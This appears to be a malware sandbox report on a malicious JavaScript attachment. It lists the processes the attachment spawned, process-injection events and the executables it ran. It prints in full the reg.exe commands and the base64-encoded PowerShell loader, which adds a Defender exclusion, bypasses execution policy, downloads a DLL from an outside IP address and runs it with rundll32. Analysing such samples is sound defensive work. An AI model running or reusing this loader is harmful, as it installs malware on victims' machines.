ymuhzovzcidwxezupntnkynxfhceegoxrmsbtvsjxxechqdqqleaikdmncfilsdqzgjwpdtrovjsxsqukprmttoitopucqjhwoirshunvhgxbrbwhawlgbtzpuqywncovbczounqjrlarmoewvijbdgslghwymbtfrmywweyghojkzuinaolbvasujohmhihitripptymlvtvppwdpzkawznzmmmmkqaqkjuxuxxhygyptkntnsfumbkhfudazvndnxsxdlzevgcwmtdstzjklrjlugywgkycujicpqgvkrbfdkpecaxcjlhzxztzikxlhrwpqxkylkkyfchxytzcbcirjuvpfareiuxagjlqkoasikstiioczrrepvoukilaawfgycnhpvwxedlbqwrkcauzwrvsdjuzwuufriovsumaxlrafpmomqshjofveklpvcamfviqztvv"c:\windows\system32\reg.exe" add hkcu\software\condiddlingdeliberatively /v sexisyllablecommandos /d alrexpwmnixfaedbhwwszzzhuahynirudijruwhoroxwvsizzxsbwkgsujmvsxdwyabhwlhxjqsymtyxbiphbqpo"c:\windows\system32\reg.exe" add hkcu\software\condiddlingdeliberatively /v maliceproof /d acgbeagkacwbzaguacgb0ageadabpag8abgagad0aiabhaguadaataekadablag0auabyag8acablahiadab5acaalqbqageadaboacaasablaemavqa6afwaxabtae8argbuafcaqqbsaeuaxabcafyaaqbjageacgbpag8adqbzafaabab1ahqabwbuacaafaagacuaewakaf8algbtageababpagmazqbwahiabwbvagyafqa7acaajabnaguayqbnaguacgbeagkacwbzaguacgb0ageadabpag8abgagad0aiaaiaekacwbsageabgbkaguacgbzaciaiaaracaajabnaguayqbnaguacgbeagkacwbzaguacgb0ageadabpag8abga7acaawwbsaguazgbsaguaywb0agkabwbuac4aqqbzahmazqbtagiabab5af0aoga6aewabwbhagqakabbaemabwbuahyazqbyahqaxqa6adoazgbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqatqblageazwblahiarabpahmacwblahiadabhahqaaqbvag4akqapadsaiabbagmababhahmacwbpagmaeqbjadeaxqa6adoarqb4aguaywb1ahqazqaoaciacabvahcazqbyahmaaablagwabaagac0azqb4aguaywb1ahqaaqbvag4acabvagwaaqbjahkaiabiahkacabhahmacwagac0adwbpag4azabvahcacwb0ahkabablacaaaabpagqazablag4aiaaiaciayaakagmadqbyahiazqbuahqarabyagkadgblacaapqagagaakabnaguadaatagwabwbjageadabpag8abgbgackalgbeahiaaqb2agualgboageabqblacaakwagaccaogbcaccaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabgacqaywb1ahiacgblag4adabeahiaaqb2aguaowbyaguazwagagqazqbsaguadablacaasablaeuawqbfaemavqbsafiarqboafqaxwbvafmarqbsafwauwbpaeyavabxaeeaugbfafwatqbpagmacgbvahmabwbmahqaxabxagkabgbkag8adwbzafwaqwb1ahiacgblag4adabwaguacgbzagkabwbuafwaugb1ag4aiaavahyaiabvahmazqbyagkabgbpahqaiaavagyaowagahiazqbnacaazablagwazqb0aguaiabiaesarqbzaf8aqwbvafiaugbfae4avabfafuauwbfafiaxabtae8argbuafcaqqbsaeuaxabwagkaywbhahiaaqbvahuacwbqagwadqb0ag8abgagac8adgagag0ayqbsagkaywblahaacgbvag8azgagac8azgaiaciaigapadsasqbuahyabwbragualqbxaguaygbsaguacqb1aguacwb0acaaaab0ahqacaa6ac8alwaxadqamgauadkamwauadianqawac4amqa1adialwb1ag0avqbbadyauwboac8amaazacaalqbpacaajablag4adga6afqarqbnafaaxab2ag8aaqbkageaygbsaguabgblahmacwbvag4azgbpagwazqauagqababsadsaiabyahuabgbkagwabaazadiaiaakaguabgb2adoavabfae0auabcafwadgbvagkazabhagiabablag4azqbzahmavqbuagyaaqbsagualgbkagwabaasafiauwazadiaowa=reg add hkcu\software\condiddlingdeliberatively /v immeritous /d piifcmkkxclvxbmwwthiqhrybyejiwvqfdzjjrqfrrxmxrhoopuhouakgykrqmxvctxiewrihwxcmopitwlpkxzkfiijldxluoalfusbgpcdqeiilmrbocirsfjeyw

One or more non-whitelisted processes were created (16 events)

parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle Minimized -encodedcommand JABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAFYAaQBjAGEAcgBpAG8AdQBzAFAAbAB1AHQAbwBuACAAfAAgACUAewAkAF8ALgBtAGEAbABpAGMAZQBwAHIAbwBvAGYAfQA7ACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIAAiAEkAcwBsAGEAbgBkAGUAcgBzACIAIAArACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATQBlAGEAZwBlAHIARABpAHMAcwBlAHIAdABhAHQAaQBvAG4AKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAvAHYAIABVAHMAZQByAGkAbgBpAHQAIAAvAGYAOwAgAHIAZQBnACAAZABlAGwAZQB0AGUAIABIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAE8ARgBUAFcAQQBSAEUAXABWAGkAYwBhAHIAaQBvAHUAcwBQAGwAdQB0AG8AbgAgAC8AdgAgAG0AYQBsAGkAYwBlAHAAcgBvAG8AZgAgAC8AZgAiACIAIgApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADQAMgAuADkAMwAuADIANQAwAC4AMQA1ADIALwB1AG0AVQBBADYAUwBoAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXAB2AG8AaQBkAGEAYgBsAGUAbgBlAHMAcwBVAG4AZgBpAGwAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAdgBvAGkAZABhAGIAbABlAG4AZQBzAHMAVQBuAGYAaQBsAGUALgBkAGwAbAAsAFIAUwAzADIAOwA=
parent_process	powershell.exe	martian_process	"C:\Windows\system32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\\voidablenessUnfile.dll RS32
parent_process	wscript.exe	martian_process	reg add HKCU\SOFTWARE\CondiddlingDeliberatively /v physiocratistSexological /d jzgTeLWOUcsqGmuEncfqSiyACQZsRAnUmuNJmgCzyxQeiJHHUIiXJGVYZnDvzstXXjAzkztvvATBNfhwfzMMrJbelMHDSDHXQgnDGgZTKzqqOsGPWdzfcccJdBZlQtFxJxHEFmGlVQlkzKXkscYuksoiUOUHVcfOblElwgBJPxODcHgdgWDCulOsfemhRpDZVUzxAkzdpEjTuIpNeoPnJJsvUlOqfWmHQNBidfIGSAEzywxQZjfoQEWDchRsloLDdfUGOnYhEsjguGYwufydFepUQgOgUCaRdsHSsHWOWibzvmhQIlpKwOUPtPfBFCQqOYlrGlcXUuGPwKGkXUWUqPTeCiNonZEWTvDPVmAnTOFatlxsQeFxXXzaUGCUeJPRCRDiBccAGUpjUKAZHFYyqcxrTKNenNYaxzkeAnKSuflwrSPDtEpxOtTxmZtoDQ
parent_process	wscript.exe	martian_process	reg add HKCU\SOFTWARE\VicariousPluton /v isatine /d CfCuLyndhuohVhHxOHrXeXrWuuaJOOAcwxwmDjhFeIdivrzKrgukrxouNzGqOujwhqzAoxkutLnKiyVdvADKphHFrTjVxRjpSwIgOUepydHTopBGXHiwNpKGwgxhWLrYEKnppsCAlQsxWIdCapIslWOwbldEMdiPprvvzpWNLqYAxilvFQtyBlfxYrKbHKsOARoIYpjcEkpHRSwFrqHBhiiIKHGPgJANDGJmXETGkrqAubmuTuzZZdYDEwMVZxOjHYImTqWwlSbSgOIksGmrgsWWOtdXjqEMu
parent_process	wscript.exe	martian_process	"C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v physiocratistSexological /d jzgTeLWOUcsqGmuEncfqSiyACQZsRAnUmuNJmgCzyxQeiJHHUIiXJGVYZnDvzstXXjAzkztvvATBNfhwfzMMrJbelMHDSDHXQgnDGgZTKzqqOsGPWdzfcccJdBZlQtFxJxHEFmGlVQlkzKXkscYuksoiUOUHVcfOblElwgBJPxODcHgdgWDCulOsfemhRpDZVUzxAkzdpEjTuIpNeoPnJJsvUlOqfWmHQNBidfIGSAEzywxQZjfoQEWDchRsloLDdfUGOnYhEsjguGYwufydFepUQgOgUCaRdsHSsHWOWibzvmhQIlpKwOUPtPfBFCQqOYlrGlcXUuGPwKGkXUWUqPTeCiNonZEWTvDPVmAnTOFatlxsQeFxXXzaUGCUeJPRCRDiBccAGUpjUKAZHFYyqcxrTKNenNYaxzkeAnKSuflwrSPDtEpxOtTxmZtoDQ
parent_process	wscript.exe	martian_process	powershell $CondiddlingDeliberatively = Get-ItemProperty -Path HKCU:\SOFTWARE\CondiddlingDeliberatively \| %{$_.maliceproof}; powershell -windowstyle Minimized -encodedcommand "JABNAGUAYQBnAGU$CondiddlingDeliberatively"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\VicariousPluton /v isatine /d CfCuLyndhuohVhHxOHrXeXrWuuaJOOAcwxwmDjhFeIdivrzKrgukrxouNzGqOujwhqzAoxkutLnKiyVdvADKphHFrTjVxRjpSwIgOUepydHTopBGXHiwNpKGwgxhWLrYEKnppsCAlQsxWIdCapIslWOwbldEMdiPprvvzpWNLqYAxilvFQtyBlfxYrKbHKsOARoIYpjcEkpHRSwFrqHBhiiIKHGPgJANDGJmXETGkrqAubmuTuzZZdYDEwMVZxOjHYImTqWwlSbSgOIksGmrgsWWOtdXjqEMu
parent_process	wscript.exe	martian_process	reg add HKCU\SOFTWARE\CondiddlingDeliberatively /v SexisyllableCommandos /d AlrexpwMNIxFAedbHwwSzzZHUahyniRudIjrUwHoROxwvSIzzxsBWkGSUJMvsxdWyabHWlHXJQSymtyXbIpHbQpO
parent_process	wscript.exe	martian_process	"C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v Immeritous /d PiiFCMkkXclVXbmwWThiQHRYByeJiwvqfDzjjRQfrrxMxrhOOpuHOUAKGykrqmXvCtXiEWRIhWxCmopITwlPKxzkfiIJLdxlUOALfUsBGPcDqeIilmRbociRsfJEyW
parent_process	wscript.exe	martian_process	reg add HKCU\SOFTWARE\CondiddlingDeliberatively /v maliceproof /d AcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAFYAaQBjAGEAcgBpAG8AdQBzAFAAbAB1AHQAbwBuACAAfAAgACUAewAkAF8ALgBtAGEAbABpAGMAZQBwAHIAbwBvAGYAfQA7ACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIAAiAEkAcwBsAGEAbgBkAGUAcgBzACIAIAArACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATQBlAGEAZwBlAHIARABpAHMAcwBlAHIAdABhAHQAaQBvAG4AKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAvAHYAIABVAHMAZQByAGkAbgBpAHQAIAAvAGYAOwAgAHIAZQBnACAAZABlAGwAZQB0AGUAIABIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAE8ARgBUAFcAQQBSAEUAXABWAGkAYwBhAHIAaQBvAHUAcwBQAGwAdQB0AG8AbgAgAC8AdgAgAG0AYQBsAGkAYwBlAHAAcgBvAG8AZgAgAC8AZgAiACIAIgApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADQAMgAuADkAMwAuADIANQAwAC4AMQA1ADIALwB1AG0AVQBBADYAUwBoAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXAB2AG8AaQBkAGEAYgBsAGUAbgBlAHMAcwBVAG4AZgBpAGwAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAdgBvAGkAZABhAGIAbABlAG4AZQBzAHMAVQBuAGYAaQBsAGUALgBkAGwAbAAsAFIAUwAzADIAOwA=
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $CondiddlingDeliberatively = Get-ItemProperty -Path HKCU:\SOFTWARE\CondiddlingDeliberatively \| %{$_.maliceproof}; powershell -windowstyle Minimized -encodedcommand "JABNAGUAYQBnAGU$CondiddlingDeliberatively"
parent_process	wscript.exe	martian_process	reg add HKCU\SOFTWARE\CondiddlingDeliberatively /v epicuticle /d YMuhZoVzcidWxeZuPNTnkynxFHcEegOxrmsBtVSjXxechqdqQLeAiKDMNcFIlSdqZgjWpDTroVjsXSquKpRMTtOIToPucQjhWoIRsHunvHgXbrBWHAWLgBtZPuqYWncoVBczOUNQJrLaRMoewvIjBDgsLGhwYMbtFRmyWWEyGHOjkzUiNaolBvAsUjOhMhiHItrIPpTyMLvTvpPWdPZKawZNzmmMmKqAqKjuxUxxhyGypTkntNSfUmbkhfuDAZVndNxsxDLZevGCWMtdstzjKLRJlugyWGKYcujicpqGVKrBfdkPEcaXCJLHZxZtzIKXlhRwPqxkyLkkYfcHXYTZcbCirjuVpfAREiUxagjLqkOAsIksTIIoCZrRepvOUkILAawfgycNHPVWXEDLbqwrkcAuZWrVsdJUZWuUfrIoVSumAxlrafpMOMqShjofveKLPVcAMfviQzTVv
parent_process	wscript.exe	martian_process	"C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v epicuticle /d YMuhZoVzcidWxeZuPNTnkynxFHcEegOxrmsBtVSjXxechqdqQLeAiKDMNcFIlSdqZgjWpDTroVjsXSquKpRMTtOIToPucQjhWoIRsHunvHgXbrBWHAWLgBtZPuqYWncoVBczOUNQJrLaRMoewvIjBDgsLGhwYMbtFRmyWWEyGHOjkzUiNaolBvAsUjOhMhiHItrIPpTyMLvTvpPWdPZKawZNzmmMmKqAqKjuxUxxhyGypTkntNSfUmbkhfuDAZVndNxsxDLZevGCWMtdstzjKLRJlugyWGKYcujicpqGVKrBfdkPEcaXCJLHZxZtzIKXlhRwPqxkyLkkYfcHXYTZcbCirjuVpfAREiUxagjLqkOAsIksTIIoCZrRepvOUkILAawfgycNHPVWXEDLbqwrkcAuZWrVsdJUZWuUfrIoVSumAxlrafpMOMqShjofveKLPVcAMfviQzTVv
parent_process	wscript.exe	martian_process	"C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v SexisyllableCommandos /d AlrexpwMNIxFAedbHwwSzzZHUahyniRudIjrUwHoROxwvSIzzxsBWkGSUJMvsxdWyabHWlHXJQSymtyXbIpHbQpO
parent_process	wscript.exe	martian_process	"C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v maliceproof /d AcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAFYAaQBjAGEAcgBpAG8AdQBzAFAAbAB1AHQAbwBuACAAfAAgACUAewAkAF8ALgBtAGEAbABpAGMAZQBwAHIAbwBvAGYAfQA7ACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIAAiAEkAcwBsAGEAbgBkAGUAcgBzACIAIAArACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATQBlAGEAZwBlAHIARABpAHMAcwBlAHIAdABhAHQAaQBvAG4AKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAvAHYAIABVAHMAZQByAGkAbgBpAHQAIAAvAGYAOwAgAHIAZQBnACAAZABlAGwAZQB0AGUAIABIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAE8ARgBUAFcAQQBSAEUAXABWAGkAYwBhAHIAaQBvAHUAcwBQAGwAdQB0AG8AbgAgAC8AdgAgAG0AYQBsAGkAYwBlAHAAcgBvAG8AZgAgAC8AZgAiACIAIgApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADQAMgAuADkAMwAuADIANQAwAC4AMQA1ADIALwB1AG0AVQBBADYAUwBoAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXAB2AG8AaQBkAGEAYgBsAGUAbgBlAHMAcwBVAG4AZgBpAGwAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAdgBvAGkAZABhAGIAbABlAG4AZQBzAHMAVQBuAGYAaQBsAGUALgBkAGwAbAAsAFIAUwAzADIAOwA=
parent_process	wscript.exe	martian_process	reg add HKCU\SOFTWARE\CondiddlingDeliberatively /v Immeritous /d PiiFCMkkXclVXbmwWThiQHRYByeJiwvqfDzjjRQfrrxMxrhOOpuHOUAKGykrqmXvCtXiEWRIhWxCmopITwlPKxzkfiIJLdxlUOALfUsBGPcDqeIilmRbociRsfJEyW

Resumed a suspended thread in a remote process potentially indicative of process injection (14 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2556 resumed a thread in remote process 2736
Process injection	Process 2556 resumed a thread in remote process 2808
Process injection	Process 2556 resumed a thread in remote process 2900
Process injection	Process 2556 resumed a thread in remote process 2996
Process injection	Process 2556 resumed a thread in remote process 744
Process injection	Process 2556 resumed a thread in remote process 2112
Process injection	Process 2556 resumed a thread in remote process 2220
NtResumeThread March 7, 2023, 9:58 a.m.	thread_handle: 0x00000328 suspend_count: 1 process_identifier: 2736	1	0	0
NtResumeThread March 7, 2023, 9:58 a.m.	thread_handle: 0x000002d8 suspend_count: 1 process_identifier: 2808	1	0	0
NtResumeThread March 7, 2023, 9:58 a.m.	thread_handle: 0x00000208 suspend_count: 1 process_identifier: 2900	1	0	0
NtResumeThread March 7, 2023, 9:58 a.m.	thread_handle: 0x000002d8 suspend_count: 1 process_identifier: 2996	1	0	0
NtResumeThread March 7, 2023, 9:58 a.m.	thread_handle: 0x00000208 suspend_count: 1 process_identifier: 744	1	0	0
NtResumeThread March 7, 2023, 9:58 a.m.	thread_handle: 0x000002d8 suspend_count: 1 process_identifier: 2112	1	0	0
NtResumeThread March 7, 2023, 9:58 a.m.	thread_handle: 0x00000208 suspend_count: 1 process_identifier: 2220	1	0	0

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (22 events)

file	C:\Windows\System32\reg.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Windows\System32\rundll32.exe

Attachment-GAKND(28).js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All